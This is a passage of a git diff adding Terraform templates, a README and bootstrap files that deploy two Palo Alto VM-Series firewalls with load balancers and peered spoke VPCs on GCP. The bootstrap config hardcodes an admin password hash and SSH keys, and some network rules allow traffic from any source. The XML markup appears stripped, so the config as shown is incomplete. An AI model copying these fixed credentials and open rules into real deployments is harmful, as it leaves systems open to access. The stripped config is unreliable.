PROJECT ID & AUTHFILE +#************************************************************************************ +variable "main_project" { + description = "Existing project ID for main project (all resources deployed in main.tf)" + default = "host-project-242119" +} + +variable "main_project_authfile" { + description = "Authentication file for main project (all resources deployed in main.tf)" + default = "host-project-b533f464016c.json" +} + +#************************************************************************************ +# spoke1.tf PROJECT ID & AUTHFILE +#************************************************************************************ +variable "spoke1_project" { + description = "Existing project for spoke1 (can be the same as main project and can be same as main project)." + default = "host-project-242119" +} + +variable "spoke1_project_authfile" { + description = "Authentication file for spoke1 project (all resources deployed in spoke1.tf)" + default = "host-project-b533f464016c.json" +} + +#************************************************************************************ +# spoke2.tf PROJECT ID & AUTHFILE +#************************************************************************************ +variable "spoke2_project" { + description = "Existing project for spoke2 (can be the same as main project and can be same as main project)." + default = "host-project-242119" +} + +variable "spoke2_project_authfile" { + description = "Authentication file for spoke2 project (all resources deployed in spoke2.tf and can be same as main project)" + default = "host-project-b533f464016c.json" +} + +#************************************************************************************ +# VMSERIES SSH KEY & IMAGE (not required if bootstrapping) +#************************************************************************************ +variable "vmseries_ssh_key" { + default = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDa7UUo1v42jebXVHlBof9E9GAFfalTndZQmvlmFu9e88euqrLI4xEZwg9ihwPFVTXOmrAogye6ojv5rbf3f13ZFYB+USjcR/9RFX+DKkPmXluC5Xq3z0ZlxY3QETHSlr6G8pfEqNwFebYJmKZ1MVNUztmb1DTIhjbFN4IAK/8NzQTbOYnEbXV4BB9E9Xe7dtuDuQrgaoII7KITnYdY4tjI10/K01Ay52PC7eISvZBRZntto2Mg1WjWQAwyIJHFC8nXoE04Wbzv91ohLfs/Og/dSOhdFymX1KVx5XSZWZ0POEOFY3rsDHFDrMiZIxipfuvBtEsznExp7ybkIDtWOxNX admin" +} + +#************************************************************************************ +# UBUNTU SSH KEY +#************************************************************************************ +variable "ubuntu_ssh_key" { + default = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDk7y0D0Rz4F5J9Lu7gtTRTaEkJdWNLpmnDXcvHvaNC3euQ0KITIU6XaPHlXiB1M8pCrmBw3CFkFLxnPoGHrcN39wi2BR9d6Y1piz1v0gJqbggdMloSnrz51OVPqqC5BjtN/lB9hTcyNrh4MDfv37sRChHJb31s934vbj+qeiR16ZeLHH5moRXnyuzIvVUePnXHZvYz0M+YxJtvf806cz+Dvio72Y5g69/DUWReTNZ3h51MKseYMJT0Uu7mPJUZlH+xURc8zzzFazTE1jD7qL2z497si7oVHzmHm5nCECNayore3jzp5YYQkzEfe2fujxeM4UGlEBYuMkUxlH8QV5qN ubuntu" +} + +variable "vmseries_image" { + # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-byol-814" + default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle1-814" + # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle2-814" +} diff --git a/gcp/adv_peering_2fw_2spoke_common/GUIDE.pdf b/gcp/adv_peering_2fw_2spoke_common/GUIDE.pdf new file mode 100644 index 00000000..ef6db3f1 Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke_common/GUIDE.pdf differ diff --git a/gcp/adv_peering_2fw_2spoke_common/README.md b/gcp/adv_peering_2fw_2spoke_common/README.md new file mode 100644 index 00000000..0ac8b6bc --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/README.md @@ -0,0 +1,59 @@ +# 2 x VM-Series / Public LB / Internal LB / 2 x Spoke VPCs + +Terraform creates 2 VM-Series firewalls that secure ingress/egress traffic from spoke VPCs. The spoke VPCs are connected (via VPC Peering) to the VM-Series trust VPC. All TCP/UDP traffic originating from the spokes is routed to internal load balancers in the trust VPC. + +Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/gcp/adv_peering_2fw_2spoke_common/GUIDE.pdf) for more information. + +
+

+ +

+ + +## Prerequistes +* Valid GCP Account with existing project +* Access to GCP Cloud Terminal or to a machine with a Terraform 12 installation + +
+ +## How to Deploy +### 1. Setup & Download Build +In your project, open GCP Cloud Terminal and run the following. +``` +$ gcloud services enable compute.googleapis.com +$ ssh-keygen -f ~/.ssh/gcp-demo -t rsa -C gcp-demo +$ git clone https://github.com/wwce/terraform; cd terraform/gcp/adv_peering_2fw_2spoke_common +``` + +### 2. Edit terraform.tfvars +Open terraform.tfvars and edit variables (lines 1-4) to match your Project ID, SSH Key (from step 1), and VM-Series type. + +``` +$ vi terraform.tfvars +``` + +

+Your terraform.tfvars should look like this before proceeding + +

+ +### 3. Deploy Build +``` +$ terraform init +$ terraform apply +``` + +
+ +## How to Destroy +Run the following to destroy the build and remove the SSH key created in step 1. +``` +$ terraform destroy +$ rm ~/.ssh/gcp-demo* +``` + +
+ +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/authcodes b/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/authcodes new file mode 100644 index 00000000..0519ecba --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/authcodes @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/bootstrap.xml b/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/bootstrap.xml new file mode 100644 index 00000000..5391083c --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/bootstrap.xml @@ -0,0 +1,1065 @@ + + + + + + + + + yes + no + yes + no + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + PA-VM + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDbHV3bGJ4c0Q3QUNFdHYvSVR3R2llSlRqWFpGTjR6QnhGb2ZZdlRVR1RRZ1plU0M5c2RFbHFZdlhIZGRHdnNOVWhON2lLQTdjb2dMTnJGa3R5aXVDZWFlMk9jeXVCNXJ4UXY1YzdCSVZrMlFuMkpaWDNYa2lyS1hBN0NOZUNUWllibFN6dExpbTkzTENPR0FhMG0zYS9oTXVWbGlpM3FrTU1NbUhmakoxQ2trc1NmdkpUL1BLb3c2eFpkVS9Kem5lSThsNVhSeTdUc0NZU1ovdVdOa21IWDdibDV4WFpPdEZOOEExU0wrRWFUU3ZHQ2ZNMlNLNm5wSEZRK1RCek5adFh2YmxLcWtJQWJhZkhuSXI1TWFEQ1BhVUgyc1B3YXY1V2syOU1idmh3cHZEeXVLaERkR3U3WkExOTlKUDNrUXc5U3pva2diTEU1V1EyRHI2cnBBQ3YgZ2NwLWRlbW8= + + + yes + no + yes + no + + + 8.8.8.8 + 4.2.2.2 + mgmt-interface-swap + + + + + + + + + + + no + + + no + + + no + + + + + + + no + + + no + + + + + + + + + + no + + + + + health-check + + + + + + + + 3 + 5 + wait-recover + + + + + no + yes + + + + + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + loopback.1 + + + + + + + + + + + + 192.168.2.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 35.191.0.0/16 + + + + + + + 192.168.2.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 130.211.0.0/22 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/2 + 10 + 10.1.0.0/24 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/2 + 10 + 10.2.0.0/24 + + + + + + + 192.168.1.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + + + + + + + + + + loopback.1 + ethernet1/2 + + + + + + + ethernet1/1 + + + + + + + + ethernet1/1 + ethernet1/2 + loopback.1 + vlan + loopback + tunnel + + + + gcp-common-vr + + + + + + + + + + + 221 + + + + + + + + + + 222 + + + + + + + + + + + + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + web-browsing + + + service-http + service-https + + + any + + no + yes + allow + panorama + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + ssh + + + service-tcp-221 + service-tcp-222 + + + any + + no + yes + allow + no + If required, this enables SSH access from the VM-Series untrust elastic/public IP to the web-server over TCP/221 and the db-server over TCP/222. + panorama + + + + trust + + + trust + + + gcp-health-probes + + + any + + + any + + + any + + + ssh + + + application-default + + + any + + allow + universal + yes + panorama + + + + trust + + + trust + + + spoke1-vpc + spoke2-vpc + + + spoke1-vpc + spoke2-vpc + + + any + + + any + + + any + + + application-default + + + any + + allow + panorama + + + + untrust + + + trust + + + any + + + any + + + any + + + any + + + apt-get + ssl + web-browsing + + + application-default + + + any + + no + yes + allow + no + panorama + + + + + + + deny + no + yes + panorama + + + deny + no + yes + panorama + + + + + + + + + + + + + + + + + + + + + + ethernet1/2 + + + + + untrust + + + untrust + + + any + + + any + + service-tcp-222 + ipv4 + + spoke2-vm + 22 + + ethernet1/1 + no + + + + + + ethernet1/2 + + + + + untrust + + + untrust + + + any + + + any + + service-tcp-221 + ipv4 + ethernet1/1 + + spoke1-vm + 22 + + no + + + + + + ethernet1/2 + + + + + untrust + + + untrust + + + any + + + any + + service-http + ipv4 + ethernet1/1 + + spoke1-intlb + 80 + + + + + trust + + + trust + + + gcp-health-probes + + + any + + any + ethernet1/2 + + loopback-interface + + No NAT on GCP LB health check. + + + + + + ethernet1/1 + + + + + untrust + + + trust + + + any + + + any + + any + ipv4 + + + + + + + + + + + + + +
+ + 130.211.0.0/22 + + gcp-resource + + + + 35.191.0.0/16 + + gcp-resource + + + + 100.64.0.1 + + gcp-resource + + Loopback interface for GLB healthcheck + + + 10.1.0.100 + + gcp-resource + + + + 10.1.0.2 + + gcp-resource + + + + 10.1.0.0/24 + + gcp-resource + + + + 10.2.0.2 + + gcp-resource + + + + 10.2.0.0/24 + + gcp-resource + + +
+ + + + gcp-health-probe-1 + gcp-health-probe-2 + + + gcp-resource + + + + + + + + + + + + color20 + + + color13 + + + color24 + + + color3 + + + + + + + + + + + + + + + + + + + + + + + +
+
+
+
+ + + + + + yes + + + $1$xxqwnwvr$El9XN5KexgoltjkVjbkcd0 + + + * + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDbHV3bGJ4c0Q3QUNFdHYvSVR3R2llSlRqWFpGTjR6QnhGb2ZZdlRVR1RRZ1plU0M5c2RFbHFZdlhIZGRHdnNOVWhON2lLQTdjb2dMTnJGa3R5aXVDZWFlMk9jeXVCNXJ4UXY1YzdCSVZrMlFuMkpaWDNYa2lyS1hBN0NOZUNUWllibFN6dExpbTkzTENPR0FhMG0zYS9oTXVWbGlpM3FrTU1NbUhmakoxQ2trc1NmdkpUL1BLb3c2eFpkVS9Kem5lSThsNVhSeTdUc0NZU1ovdVdOa21IWDdibDV4WFpPdEZOOEExU0wrRWFUU3ZHQ2ZNMlNLNm5wSEZRK1RCek5adFh2YmxLcWtJQWJhZkhuSXI1TWFEQ1BhVUgyc1B3YXY1V2syOU1idmh3cHZEeXVLaERkR3U3WkExOTlKUDNrUXc5U3pva2diTEU1V1EyRHI2cnBBQ3YgZ2NwLWRlbW8= + + + + yes + 8 + + + + + + + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + auth + All Logs + yes + + + data + All Logs + yes + + + threat + All Logs + yes + + + traffic + All Logs + yes + + + tunnel + All Logs + yes + + + url + All Logs + yes + + + wildfire + All Logs + yes + + + + + + +
diff --git a/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/init-cfg.txt b/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/init-cfg.txt new file mode 100644 index 00000000..8d3c0290 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/bootstrap_files/init-cfg.txt @@ -0,0 +1,10 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +dhcp-accept-server-hostname=yes +dns-primary=8.8.8.8 +dns-secondary=4.2.2.2 +op-command-modes=mgmt-interface-swap \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke_common/fw_common.tf b/gcp/adv_peering_2fw_2spoke_common/fw_common.tf new file mode 100644 index 00000000..bff4b839 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/fw_common.tf @@ -0,0 +1,131 @@ +#----------------------------------------------------------------------------------------------- +# Create bootstrap bucket for firewalls +module "bootstrap_common" { + source = "./modules/gcp_bootstrap/" + bucket_name = "fw-bootstrap-common" + file_location = "bootstrap_files/" + config = ["init-cfg.txt", "bootstrap.xml"] + license = ["authcodes"] +} + +#----------------------------------------------------------------------------------------------- +# Create firewalls +module "fw_common" { + source = "./modules/vmseries/" + names = var.fw_names_common + zones = [ + data.google_compute_zones.available.names[0], + data.google_compute_zones.available.names[1] + ] + subnetworks = [ + module.vpc_untrust.subnetwork_self_link[0], + module.vpc_mgmt.subnetwork_self_link[0], + module.vpc_trust.subnetwork_self_link[0] + ] + machine_type = var.fw_machine_type + bootstrap_bucket = module.bootstrap_common.bucket_name + mgmt_interface_swap = "enable" + ssh_key = fileexists(var.public_key_path) ? "admin:${file(var.public_key_path)}" : "" + image = "${var.fw_image}-${var.fw_panos}" + nic0_public_ip = true + nic1_public_ip = true + nic2_public_ip = false + create_instance_group = true + + dependencies = [ + module.bootstrap_common.completion, + ] +} + +module "lb_inbound" { + source = "./modules/lb_tcp_external/" + region = var.regions[0] + name = var.extlb_name + service_port = 80 + instances = module.fw_common.vm_self_link + providers = { + google = google-beta + } +} + +#----------------------------------------------------------------------------------------------- +# Create 2 internal load balancers. LB-1 is A/A for internet. LB-2 is A/P for e-w. +module "lb_outbound" { + source = "./modules/lb_tcp_internal/" + name = var.intlb_name + subnetworks = [module.vpc_trust.subnetwork_self_link[0]] + all_ports = true + ports = [] + health_check_port = "22" + network = module.vpc_trust.vpc_id + + backends = { + "0" = [ + { + group = module.fw_common.instance_group[0] + failover = false + }, + { + group = module.fw_common.instance_group[1] + failover = false + } + ] + "1" = [ + { + group = module.fw_common.instance_group[0] + failover = false + }, + { + group = module.fw_common.instance_group[1] + failover = true + } + ] + } + providers = { + google = google-beta + } +} + + +#----------------------------------------------------------------------------------------------- +# Create routes route to internal LBs. Routes will be exported to spokes via GCP peering. +resource "google_compute_route" "default" { + name = "${var.intlb_name}-default" + dest_range = "0.0.0.0/0" + network = module.vpc_trust.vpc_self_link + next_hop_ilb = module.lb_outbound.forwarding_rule[0] + priority = 99 + provider = google-beta +} + +resource "google_compute_route" "eastwest" { + name = "${var.intlb_name}-eastwest" + dest_range = "10.0.0.0/8" + network = module.vpc_trust.vpc_self_link + next_hop_ilb = module.lb_outbound.forwarding_rule[1] + priority = 99 + provider = google-beta +} + + +#----------------------------------------------------------------------------------------------- +# Outputs to terminal +output EXT-LB { + value = "http://${module.lb_inbound.forwarding_rule_ip_address}" +} + +output MGMT-FW1 { + value = "https://${module.fw_common.nic1_public_ip[0]}" +} + +output MGMT-FW2 { + value = "https://${module.fw_common.nic1_public_ip[1]}" +} + +output SSH-TO-SPOKE1 { + value = "ssh ${var.spoke_user}@${module.fw_common.nic0_public_ip[0]} -p 221 -i ${replace(var.public_key_path, ".pub", "")}" +} + +output SSH-TO-SPOKE2 { + value = "ssh ${var.spoke_user}@${module.fw_common.nic0_public_ip[0]} -p 222 -i ${replace(var.public_key_path, ".pub", "")}" +} diff --git a/gcp/adv_peering_2fw_2spoke_common/fw_vpc.tf b/gcp/adv_peering_2fw_2spoke_common/fw_vpc.tf new file mode 100644 index 00000000..075033ef --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/fw_vpc.tf @@ -0,0 +1,35 @@ +#----------------------------------------------------------------------------------------------- +# Create firewall VPCs & subnets +module "vpc_mgmt" { + source = "./modules/vpc/" + + vpc = var.mgmt_vpc + subnets = var.mgmt_subnet + cidrs = var.mgmt_cidr + regions = var.regions + allowed_sources = var.mgmt_sources + allowed_protocol = "TCP" + allowed_ports = ["443", "22"] +} + +module "vpc_untrust" { + source = "./modules/vpc/" + + vpc = var.untrust_vpc + subnets = var.untrust_subnet + cidrs = var.untrust_cidr + regions = var.regions + allowed_sources = ["0.0.0.0/0"] +} + +module "vpc_trust" { + source = "./modules/vpc/" + + vpc = var.trust_vpc + subnets = var.trust_subnet + cidrs = var.trust_cidr + regions = var.regions + allowed_sources = ["0.0.0.0/0"] + delete_default_route = true +} + diff --git a/gcp/adv_peering_2fw_2spoke_common/images/diagram.png b/gcp/adv_peering_2fw_2spoke_common/images/diagram.png new file mode 100644 index 00000000..be6e973b Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke_common/images/diagram.png differ diff --git a/gcp/adv_peering_2fw_2spoke_common/images/tfvars.png b/gcp/adv_peering_2fw_2spoke_common/images/tfvars.png new file mode 100644 index 00000000..28539794 Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke_common/images/tfvars.png differ diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/main.tf b/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/main.tf new file mode 100644 index 00000000..a93e7956 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/main.tf @@ -0,0 +1,85 @@ +locals { + bucket_name = join("", [var.bucket_name, random_string.randomstring.result]) +} +resource "random_string" "randomstring" { + length = 25 + min_lower = 15 + min_numeric = 10 + special = false +} + +resource "google_storage_bucket" "bootstrap" { + name = local.bucket_name + force_destroy = true +} + +resource "google_storage_bucket_object" "config_full" { + count = length(var.config) > 0 ? length(var.config) : "0" + name = "config/${element(var.config, count.index)}" + source = "${var.file_location}${element(var.config, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "content_full" { + count = length(var.content) > 0 ? length(var.content) : "0" + name = "content/${element(var.content, count.index)}" + source = "${var.file_location}${element(var.content, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "license_full" { + count = length(var.license) > 0 ? length(var.license) : "0" + name = "license/${element(var.license, count.index)}" + source = "${var.file_location}${element(var.license, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "software_full" { + count = length(var.software) > 0 ? length(var.software) : "0" + name = "software/${element(var.software, count.index)}" + source = "${var.file_location}${element(var.software, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "config_empty" { + count = length(var.config) == 0 ? 1 : 0 + name = "config/" + content = "config/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "content_empty" { + count = length(var.content) == 0 ? 1 : 0 + name = "content/" + content = "content/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "license_empty" { + count = length(var.license) == 0 ? 1 : 0 + name = "license/" + content = "license/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "software_empty" { + count = length(var.software) == 0 ? 1 : 0 + name = "software/" + content = "software/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "null_resource" "dependency_setter" { + depends_on = [ + google_storage_bucket.bootstrap, + google_storage_bucket_object.config_full, + google_storage_bucket_object.content_full, + google_storage_bucket_object.license_full, + google_storage_bucket_object.software_full, + google_storage_bucket_object.config_empty, + google_storage_bucket_object.content_empty, + google_storage_bucket_object.license_empty, + google_storage_bucket_object.software_empty, + ] +} + diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/outputs.tf b/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/outputs.tf new file mode 100644 index 00000000..ef7f162d --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/outputs.tf @@ -0,0 +1,8 @@ +output completion { + value = null_resource.dependency_setter.id +} + +output bucket_name { + value = google_storage_bucket.bootstrap.name +} + diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/variables.tf b/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/variables.tf new file mode 100644 index 00000000..0db2b8fd --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/gcp_bootstrap/variables.tf @@ -0,0 +1,24 @@ +variable bucket_name { +} + +variable file_location { +} + +variable config { + type = list(string) + default = [] +} + +variable content { + type = list(string) + default = [] +} + +variable license { + type = list(string) + default = [] +} + +variable software { + default = [] +} diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/main.tf b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/main.tf new file mode 100755 index 00000000..cc717264 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/main.tf @@ -0,0 +1,39 @@ + +locals { + health_check_port = var.health_check["port"] +} + +resource "google_compute_forwarding_rule" "default" { + project = var.project + name = var.name + target = google_compute_target_pool.default.self_link + load_balancing_scheme = "EXTERNAL" + port_range = var.service_port + region = var.region + ip_address = var.ip_address + ip_protocol = var.ip_protocol +} + +resource "google_compute_target_pool" "default" { + project = var.project + name = var.name + region = var.region + session_affinity = var.session_affinity + instances = var.instances + health_checks = var.disable_health_check ? [] : [google_compute_http_health_check.default.0.self_link] +} + +resource "google_compute_http_health_check" "default" { + count = var.disable_health_check ? 0 : 1 + project = var.project + name = "${var.name}-hc" + + check_interval_sec = var.health_check["check_interval_sec"] + healthy_threshold = var.health_check["healthy_threshold"] + timeout_sec = var.health_check["timeout_sec"] + unhealthy_threshold = var.health_check["unhealthy_threshold"] + + port = local.health_check_port == null ? var.service_port : local.health_check_port + request_path = var.health_check["request_path"] + host = var.health_check["host"] +} \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/outputs.tf b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/outputs.tf new file mode 100644 index 00000000..0ab49899 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/outputs.tf @@ -0,0 +1,7 @@ +output forwarding_rule { + value = google_compute_forwarding_rule.default.*.self_link +} + +output forwarding_rule_ip_address { + value = google_compute_forwarding_rule.default.ip_address +} \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/variables.tf b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/variables.tf new file mode 100644 index 00000000..2fc153ae --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_external/variables.tf @@ -0,0 +1,70 @@ + +variable project { + type = string + description = "The project to deploy to, if not set the default provider project is used." + default = "" +} + +variable region { + type = string + description = "Region used for GCP resources." +} + +variable name { + type = string + description = "Name for the forwarding rule and prefix for supporting resources." +} + +variable service_port { + type = number + description = "TCP port your service is listening on." +} + +variable session_affinity { + type = string + description = "How to distribute load. Options are `NONE`, `CLIENT_IP` and `CLIENT_IP_PROTO`" + default = "NONE" +} + +variable disable_health_check { + type = bool + description = "Disables the health check on the target pool." + default = false +} + +variable health_check { + description = "Health check to determine whether instances are responsive and able to do work" + type = object({ + check_interval_sec = number + healthy_threshold = number + timeout_sec = number + unhealthy_threshold = number + port = number + request_path = string + host = string + }) + default = { + check_interval_sec = null + healthy_threshold = null + timeout_sec = null + unhealthy_threshold = null + port = null + request_path = null + host = null + } +} + +variable ip_address { + description = "IP address of the external load balancer, if empty one will be assigned." + default = null +} + +variable ip_protocol { + description = "The IP protocol for the frontend forwarding rule: TCP, UDP, ESP, AH, SCTP or ICMP." + default = "TCP" +} + +variable instances { + type = list(string) + default = null +} \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/main.tf b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/main.tf new file mode 100755 index 00000000..bfc88575 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/main.tf @@ -0,0 +1,34 @@ +resource "google_compute_health_check" "default" { + name = "${var.name}-check-0" + + tcp_health_check { + port = var.health_check_port + } +} +resource "google_compute_region_backend_service" "default" { + count = length(var.backends) + name = "${var.name}-${count.index}" + health_checks = [google_compute_health_check.default.self_link] + network = var.network + + dynamic "backend" { + for_each = var.backends[count.index] + content { + group = lookup(backend.value, "group") + failover = lookup(backend.value, "failover") + } + } + session_affinity = "NONE" +} + +resource "google_compute_forwarding_rule" "default" { + count = length(var.backends) + name = "${var.name}-all-${count.index}" + load_balancing_scheme = "INTERNAL" + ip_address = var.ip_address + ip_protocol = var.ip_protocol + all_ports = var.all_ports + ports = var.ports + subnetwork = var.subnetworks[0] + backend_service = google_compute_region_backend_service.default[count.index].self_link +} \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/outputs.tf b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/outputs.tf new file mode 100644 index 00000000..08589a14 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/outputs.tf @@ -0,0 +1,4 @@ +output forwarding_rule { + value = google_compute_forwarding_rule.default.*.self_link +} + diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/variables.tf b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/variables.tf new file mode 100644 index 00000000..1e634c77 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/variables.tf @@ -0,0 +1,37 @@ +variable name { +} + +variable health_check_port { + default = "22" +} + +variable backends { + description = "Map backend indices to list of backend maps." + type = map(list(object({ + group = string + failover = bool + }))) +} + +variable subnetworks { + type = list(string) +} + +variable ip_address { + default = null +} + +variable ip_protocol { + default = "TCP" +} +variable all_ports { + type = bool +} +variable ports { + type = list(string) + default = [] +} + +variable network { + default = null +} \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vm/main.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vm/main.tf new file mode 100644 index 00000000..2f42125b --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/vm/main.tf @@ -0,0 +1,45 @@ +resource "google_compute_instance" "default" { + count = length(var.names) + name = element(var.names, count.index) + machine_type = var.machine_type + zone = element(var.zones, count.index) + can_ip_forward = true + allow_stopping_for_update = true + metadata_startup_script = var.startup_script + + metadata = { + serial-port-enable = true + ssh-keys = var.ssh_key + } + + network_interface { + subnetwork = element(var.subnetworks, count.index) + } + + boot_disk { + initialize_params { + image = var.image + } + } + + service_account { + scopes = var.scopes + } +} + + +resource "google_compute_instance_group" "default" { + count = var.create_instance_group ? length(var.names) : 0 + name = "${element(var.names, count.index)}-${element(var.zones, count.index)}-ig" + zone = element(var.zones, count.index) + instances = [google_compute_instance.default[count.index].self_link] + + named_port { + name = "http" + port = "80" + } + + lifecycle { + create_before_destroy = true + } +} diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vm/outputs.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vm/outputs.tf new file mode 100644 index 00000000..3e4c700a --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/vm/outputs.tf @@ -0,0 +1,11 @@ +output vm_names { + value = google_compute_instance.default.*.name +} + +output vm_self_link { + value = google_compute_instance.default.*.self_link +} + +output instance_group { + value = google_compute_instance_group.default.*.self_link +} diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vm/variables.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vm/variables.tf new file mode 100644 index 00000000..03fa3cac --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/vm/variables.tf @@ -0,0 +1,43 @@ +variable names { + type = list(string) +} + +variable machine_type { +} +variable create_instance_group { + type = bool + default = false +} + +variable instance_group_names { + type = list(string) + default = ["vmseries-instance-group"] +} +variable zones { + type = list(string) +} +variable ssh_key { + default = "" +} +variable image { +} + +variable subnetworks { + type = list(string) +} + +variable scopes { + type = list(string) + + default = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + +variable startup_script { + default = "" +} + diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/main.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/main.tf new file mode 100644 index 00000000..c74ee4fa --- /dev/null +++ 